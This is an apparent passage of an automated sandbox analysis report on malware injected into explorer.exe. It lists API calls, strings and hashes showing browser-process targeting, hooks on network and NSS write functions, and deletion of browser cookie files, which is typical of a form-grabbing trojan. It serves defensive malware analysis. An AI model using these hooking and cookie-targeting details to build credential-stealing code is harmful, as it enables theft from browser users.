GetModuleHandleA GetProcAddress 33->43 34->33 35->36 45 2c23b5b-2c23b67 call 2c21c08 36->45 46 2c23b6c-2c23b79 GetModuleHandleA GetProcAddress 36->46 52 2c23ace-2c23ad2 38->52 39->38 40->16 53 2c23aaa-2c23ac5 GetModuleHandleA 40->53 42->43 54 2c23b08-2c23b0f call 2c216c7 42->54 55 2c239ea-2c239f3 GetModuleHandleA GetProcAddress 43->55 56 2c239f9-2c23a05 43->56 45->46 50 2c23b7b-2c23b87 call 2c21c08 46->50 51 2c23b8c-2c23bbe call 2c216c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 46->51 50->51 51->16 52->16 62 2c23ad8-2c23aea call 2c216c7 call 2c22d9a 52->62 61 2c23ac7-2c23acc GetModuleHandleA 53->61 53->62 54->16 55->54 55->56 63 2c23b03 call 2c21c08 56->63 61->52 62->54 79 2c23aec-2c23af5 call 2c21274 62->79 63->54 73 2c23c64-2c23c74 CreateToolhelp32Snapshot 69->73 80 2c23c53-2c23c59 call 2c21261 70->80 81 2c23c4e call 2c23829 70->81 76 2c23c7a-2c23c8e Process32First 73->76 77 2c23d7d-2c23d88 Sleep 73->77 82 2c23d6e-2c23d70 76->82 77->73 79->54 91 2c23af7-2c23b01 79->91 80->69 81->80 85 2c23c93-2c23ca5 lstrcmpiA 82->85 86 2c23d76-2c23d77 CloseHandle 82->86 89 2c23ca7-2c23cb5 lstrcmpiA 85->89 90 2c23cda-2c23ce3 call 2c212aa 85->90 86->77 89->90 93 2c23cb7-2c23cc5 lstrcmpiA 89->93 97 2c23d62-2c23d68 Process32Next 90->97 98 2c23ce5-2c23cee call 2c21305 90->98 91->63 93->90 94 2c23cc7-2c23cd4 call 2c22ea8 93->94 94->90 94->97 97->82 98->97 102 2c23cf0-2c23cf7 call 2c21320 98->102 102->97 105 2c23cf9-2c23d06 call 2c21274 102->105 105->97 108 2c23d08-2c23d5d lstrcmpiA call 2c21090 call 2c21fe5 call 2c21090 105->108 108->97
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C23886
                                                                                                                          • GetCurrentProcessId.KERNEL32(00000001), ref: 02C2389B
                                                                                                                          • wsprintfA.USER32 ref: 02C238B6
                                                                                                                            • Part of subcall function 02C2118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02C211A9
                                                                                                                            • Part of subcall function 02C2118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02C211C1
                                                                                                                            • Part of subcall function 02C2118D: lstrlen.KERNEL32(?,00000000), ref: 02C211C9
                                                                                                                            • Part of subcall function 02C2118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02C211D4
                                                                                                                            • Part of subcall function 02C2118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02C211EE
                                                                                                                            • Part of subcall function 02C2118D: wsprintfA.USER32 ref: 02C21205
                                                                                                                            • Part of subcall function 02C2118D: CryptDestroyHash.ADVAPI32(?), ref: 02C2121E
                                                                                                                            • Part of subcall function 02C2118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02C21228
                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C238CD
                                                                                                                          • GetLastError.KERNEL32 ref: 02C238D3
                                                                                                                          • RtlInitializeCriticalSection.NTDLL(02C26038), ref: 02C238F3
                                                                                                                          • PathFindFileNameA.SHLWAPI(?), ref: 02C238FA
                                                                                                                          • lstrcat.KERNEL32(02C25CDE,00000000), ref: 02C23910
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 02C2392A
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 02C2393C
                                                                                                                          • GetCommandLineW.KERNEL32(?), ref: 02C2394F
                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 02C2397E
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C23987
                                                                                                                          • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 02C239AF
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C239B2
                                                                                                                          • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 02C239C4
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C239C7
                                                                                                                          • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 02C239E1
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C239E4
                                                                                                                          • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 02C239EC
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C239EF
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 02C23A6D
                                                                                                                          • GetCommandLineA.KERNEL32(NetworkService), ref: 02C23A78
                                                                                                                          • StrStrIA.SHLWAPI(00000000), ref: 02C23A7B
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 02C23A8E
                                                                                                                          • GetCommandLineA.KERNEL32(NetworkService), ref: 02C23A9D
                                                                                                                          • StrStrIA.SHLWAPI(00000000), ref: 02C23AA0
                                                                                                                          • GetModuleHandleA.KERNEL32(opera.dll), ref: 02C23ABF
                                                                                                                          • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 02C23ACC
                                                                                                                          • CommandLineToArgvW.SHELL32(00000000), ref: 02C23956
                                                                                                                            • Part of subcall function 02C216C7: GetCurrentProcessId.KERNEL32 ref: 02C216D9
                                                                                                                            • Part of subcall function 02C216C7: GetCurrentThreadId.KERNEL32 ref: 02C216E1
                                                                                                                            • Part of subcall function 02C216C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02C216F1
                                                                                                                            • Part of subcall function 02C216C7: Thread32First.KERNEL32(00000000,0000001C), ref: 02C216FF
                                                                                                                            • Part of subcall function 02C216C7: CloseHandle.KERNEL32(00000000), ref: 02C21758
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 02C23A10
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 02C23A20
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 02C23A30
                                                                                                                          • GetCommandLineA.KERNEL32(NetworkService), ref: 02C23A47
                                                                                                                          • StrStrIA.SHLWAPI(00000000), ref: 02C23A4A
                                                                                                                          • GetModuleHandleA.KERNEL32(chrome.dll), ref: 02C23A5F
                                                                                                                          • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 02C23B2C
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C23B35
                                                                                                                          • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 02C23B52
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C23B55
                                                                                                                          • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 02C23B72
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C23B75
                                                                                                                          • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 02C23B99
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C23B9C
                                                                                                                          • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 02C23BA9
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C23BAC
                                                                                                                          • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 02C23BB9
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C23BBC
                                                                                                                            • Part of subcall function 02C21C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 02C21C42
                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 02C23BD9
                                                                                                                          • wsprintfA.USER32 ref: 02C23C1F
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C23C69
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 02C23C88
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 02C23D77
                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 02C23D82
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                                                                                                          • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                                                                                                          • API String ID: 2480436012-2618538661
                                                                                                                          • Opcode ID: 16f92c4055fb6c37034b9c2fbd7acf28c7b7daf6cbd330e5dae87059d2844c1e
                                                                                                                          • Instruction ID: ec39af30dffda6c82bfb602f746cb685bc68f0a5318dfc860dacacfc8eaca45a
                                                                                                                          • Opcode Fuzzy Hash: 16f92c4055fb6c37034b9c2fbd7acf28c7b7daf6cbd330e5dae87059d2844c1e
                                                                                                                          • Instruction Fuzzy Hash: 8AA1D570E903B4ABE6347B755C08F2F3A9D9F80B45B060A64E906E3141DFB8C90D9AF5

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                          • PathCombineW.SHLWAPI(00000000,00000000,*.*,7750F770,00000000,75B4B2E0,776883D0), ref: 02C215EB
                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?), ref: 02C215F7
                                                                                                                          • lstrcmpiW.KERNEL32(?,02C241C8), ref: 02C21623
                                                                                                                          • lstrcmpiW.KERNEL32(?,02C241CC), ref: 02C21633
                                                                                                                          • PathCombineW.SHLWAPI(00000000,?,?), ref: 02C2164C
                                                                                                                          • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 02C21661
                                                                                                                          • PathCombineW.SHLWAPI(00000000,?,?), ref: 02C2167E
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C2169C
                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 02C216AB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                                                                                                          • String ID: *.*$Cookies*
                                                                                                                          • API String ID: 4256701249-3228320225
                                                                                                                          • Opcode ID: ce200404e9b5046141ab3b82b5157cfdb21d5d751b5a0d32947b3ef6ab8d9b04
                                                                                                                          • Instruction ID: 83a8a806787667f9a5abd764e522b9aa9e2d52ae433f564a627c1f4dd389807e
                                                                                                                          • Opcode Fuzzy Hash: ce200404e9b5046141ab3b82b5157cfdb21d5d751b5a0d32947b3ef6ab8d9b04
                                                                                                                          • Instruction Fuzzy Hash: 822185316043755BD324AA60DC44A7F7BADEB89395F090A29F94AE3241DFB4C90C4BE2

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C213FE: wsprintfW.USER32 ref: 02C2142A
                                                                                                                            • Part of subcall function 02C213FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 02C21439
                                                                                                                            • Part of subcall function 02C213FE: wsprintfW.USER32 ref: 02C21476
                                                                                                                            • Part of subcall function 02C213FE: RemoveDirectoryW.KERNELBASE(00000000), ref: 02C2149C
                                                                                                                            • Part of subcall function 02C213FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C214AF
                                                                                                                            • Part of subcall function 02C213FE: FindClose.KERNELBASE(00000000), ref: 02C214BA
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                          • wsprintfW.USER32 ref: 02C2150D
                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?), ref: 02C2151C
                                                                                                                          • wsprintfW.USER32 ref: 02C21557
                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02C2156A
                                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 02C21571
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C21584
                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 02C2158F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                          • String ID: %s%s$*.*
                                                                                                                          • API String ID: 2055899612-705776850
                                                                                                                          • Opcode ID: c08f87d083ae0030ff356ad151768705b65d72ffc8e44ddd28473335aac33ebd
                                                                                                                          • Instruction ID: 49c743253d0e1f6ff8c48b23642d403173dbd4cd3fc14fec755c7ab459e959e2
                                                                                                                          • Opcode Fuzzy Hash: c08f87d083ae0030ff356ad151768705b65d72ffc8e44ddd28473335aac33ebd
                                                                                                                          • Instruction Fuzzy Hash: B21127316003205BD334AB349C48F6F3B9DEF85354F040A28FD4692183DFB48A5D8AE6

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                          • wsprintfW.USER32 ref: 02C2142A
                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?), ref: 02C21439
                                                                                                                          • wsprintfW.USER32 ref: 02C21476
                                                                                                                            • Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C2150D
                                                                                                                            • Part of subcall function 02C214D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02C2151C
                                                                                                                            • Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C21557
                                                                                                                            • Part of subcall function 02C214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02C2156A
                                                                                                                            • Part of subcall function 02C214D8: DeleteFileW.KERNELBASE(00000000), ref: 02C21571
                                                                                                                            • Part of subcall function 02C214D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C21584
                                                                                                                            • Part of subcall function 02C214D8: FindClose.KERNELBASE(00000000), ref: 02C2158F
                                                                                                                          • RemoveDirectoryW.KERNELBASE(00000000), ref: 02C2149C
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C214AF
                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 02C214BA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                          • String ID: %s%s$%s%s\$*.*
                                                                                                                          • API String ID: 2055899612-4093207852
                                                                                                                          • Opcode ID: ace01f9cb157ae63ab699ca6c99b3447e723aca70130d55a59652cb39d8aea83
                                                                                                                          • Instruction ID: 202b0777bf806f9e45292d0e7fd00c54e13ec3536810c50e601e7f03285bdf1f
                                                                                                                          • Opcode Fuzzy Hash: ace01f9cb157ae63ab699ca6c99b3447e723aca70130d55a59652cb39d8aea83
                                                                                                                          • Instruction Fuzzy Hash: 871127306043605BE324AB24DC48B7F7BDDEFC5305F090A2CF94AA2183DFB4494D8AA2

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 288 2c23d8d-2c23d97 call 2c21274 291 2c23e03-2c23e04 288->291 292 2c23d99-2c23dc2 call 2c21000 RtlMoveMemory 288->292 295 2c23dc4-2c23de2 call 2c21000 RtlMoveMemory 292->295 296 2c23de8-2c23dfc 292->296 295->296 300 2c23e0a-2c23e15 call 2c23be1 296->300 301 2c23dfe-2c23dff 296->301 307 2c23e20-2c23e23 300->307 308 2c23e17-2c23e1b call 2c23d8d 300->308 301->291 302 2c23e01-2c23e05 call 2c23862 301->302 302->300 308->307
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C21281
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02C23DAF
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02C23DE2
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF), ref: 02C23DEB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                                                                                                          • String ID: 0-gw
                                                                                                                          • API String ID: 4050682147-86502385
                                                                                                                          • Opcode ID: 9697bbd9cf962abae5d01a92670ac8417127d4336fc369e3c5e6eae67044fa3b
                                                                                                                          • Instruction ID: 3a9ff2379f095bb2be52af11f0edac16e2996aef307734dbc0ccdfd6ed879936
                                                                                                                          • Opcode Fuzzy Hash: 9697bbd9cf962abae5d01a92670ac8417127d4336fc369e3c5e6eae67044fa3b
                                                                                                                          • Instruction Fuzzy Hash: 8301B5309541E0EFC638AB68D848B673B5DEF40311F154A99A41697180CF3E865DEFF4

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 313 2c22ea8-2c22ebc StrStrIA 314 2c22ebe-2c22eca call 2c22e1b 313->314 315 2c22ecd-2c22ed1 313->315 314->315
                                                                                                                          APIs
                                                                                                                          • StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,02C23CD2), ref: 02C22EB4
                                                                                                                            • Part of subcall function 02C22E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,02C22EC5), ref: 02C22E27
                                                                                                                            • Part of subcall function 02C22E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 02C22E52
                                                                                                                            • Part of subcall function 02C22E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 02C22E7F
                                                                                                                            • Part of subcall function 02C22E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 02C22E92
                                                                                                                          Strings
                                                                                                                          • chrome.exe|opera.exe|msedge.exe, xrefs: 02C22EAB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$InformationQuery$Open
                                                                                                                          • String ID: chrome.exe|opera.exe|msedge.exe
                                                                                                                          • API String ID: 4117927671-3743313796
                                                                                                                          • Opcode ID: aecf36bfa16d55c4679ef59ad417f013a676d8fdd34ef9055bb6e8c8ae734f1a
                                                                                                                          • Instruction ID: a6d90cab9848d3db3bad3cc83fffc043fa26ceb8ec9dc49273c5ffa29f5f415a
                                                                                                                          • Opcode Fuzzy Hash: aecf36bfa16d55c4679ef59ad417f013a676d8fdd34ef9055bb6e8c8ae734f1a
                                                                                                                          • Instruction Fuzzy Hash: DAD0A93230027007273C297A6C0992FA58ECAC2962302023EE802D3200EE40CC0752A1

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C21374
                                                                                                                            • Part of subcall function 02C21363: Process32First.KERNEL32(00000000,?), ref: 02C21393
                                                                                                                            • Part of subcall function 02C21363: CloseHandle.KERNELBASE(00000000), ref: 02C213CB
                                                                                                                            • Part of subcall function 02C21363: lstrcmpiA.KERNEL32(?), ref: 02C213A3
                                                                                                                            • Part of subcall function 02C21363: Process32Next.KERNEL32(00000000,00000128), ref: 02C213C0
                                                                                                                          • Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C23731
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C23752
                                                                                                                          • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C23764
                                                                                                                            • Part of subcall function 02C215BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,7750F770,00000000,75B4B2E0,776883D0), ref: 02C215EB
                                                                                                                            • Part of subcall function 02C215BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 02C215F7
                                                                                                                            • Part of subcall function 02C215BE: lstrcmpiW.KERNEL32(?,02C241C8), ref: 02C21623
                                                                                                                            • Part of subcall function 02C215BE: lstrcmpiW.KERNEL32(?,02C241CC), ref: 02C21633
                                                                                                                            • Part of subcall function 02C215BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 02C2164C
                                                                                                                            • Part of subcall function 02C215BE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C2169C
                                                                                                                            • Part of subcall function 02C215BE: FindClose.KERNELBASE(00000000), ref: 02C216AB
                                                                                                                          • RtlZeroMemory.NTDLL(00000000,00001000), ref: 02C2377A
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C23783
                                                                                                                          • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C2378F
                                                                                                                          • RtlZeroMemory.NTDLL(00000000,00001000), ref: 02C237A3
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C237AC
                                                                                                                          • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C237B8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                                                                                          • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                                                                                          • API String ID: 909495591-1175993956
                                                                                                                          • Opcode ID: 4568cc9e65104476a4f125ac23c10b300af50160f1fcdf32415280043b758b6c
                                                                                                                          • Instruction ID: c7deea98261059f8ea4029a4fecc020e11a3de87ca42797a83d96845e53e284b
                                                                                                                          • Opcode Fuzzy Hash: 4568cc9e65104476a4f125ac23c10b300af50160f1fcdf32415280043b758b6c
                                                                                                                          • Instruction Fuzzy Hash: 0A11CE603813B423F83833651C82F6F654EDFA5FA1F160124F20A6A6C1CEC49A0959AE

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                          • wsprintfA.USER32 ref: 02C23C1F
                                                                                                                            • Part of subcall function 02C21235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02C2123F
                                                                                                                            • Part of subcall function 02C21235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,02C23C33), ref: 02C21251
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C23C69
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 02C23C88
                                                                                                                          • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02C23CA1
                                                                                                                          • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02C23CB1
                                                                                                                          • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02C23CC1
                                                                                                                          • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02C23D12
                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 02C23D68
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 02C23D77
                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 02C23D82
                                                                                                                            • Part of subcall function 02C21141: lstrlen.KERNEL32(?,?,?,00000000,?,02C229DD,00000001), ref: 02C21150
                                                                                                                            • Part of subcall function 02C21141: lstrlen.KERNEL32(:method POST,?,00000000,?,02C229DD,00000001), ref: 02C21155
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                          • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                                                                                                          • API String ID: 2509890648-2554907557
                                                                                                                          • Opcode ID: f561c1f224bd84857d6a40da27d8e7a5425bcf70648db2dfc30e2e4417998bd3
                                                                                                                          • Instruction ID: 5b3875d7ddc4cdca2f3a611be84b8f252b39203a8bfcd808973beb3cceb95a87
                                                                                                                          • Opcode Fuzzy Hash: f561c1f224bd84857d6a40da27d8e7a5425bcf70648db2dfc30e2e4417998bd3
                                                                                                                          • Instruction Fuzzy Hash: 7A410731A107709BD638EB749C44B3E33AEEF84B00F050A68F85693181DF28D90D9AE5

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C21374
                                                                                                                            • Part of subcall function 02C21363: Process32First.KERNEL32(00000000,?), ref: 02C21393
                                                                                                                            • Part of subcall function 02C21363: CloseHandle.KERNELBASE(00000000), ref: 02C213CB
                                                                                                                            • Part of subcall function 02C21363: lstrcmpiA.KERNEL32(?), ref: 02C213A3
                                                                                                                            • Part of subcall function 02C21363: Process32Next.KERNEL32(00000000,00000128), ref: 02C213C0
                                                                                                                          • Sleep.KERNELBASE(000003E8,?,00000000,?,02C2382F,?,02C23C53,00000001), ref: 02C235FA
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
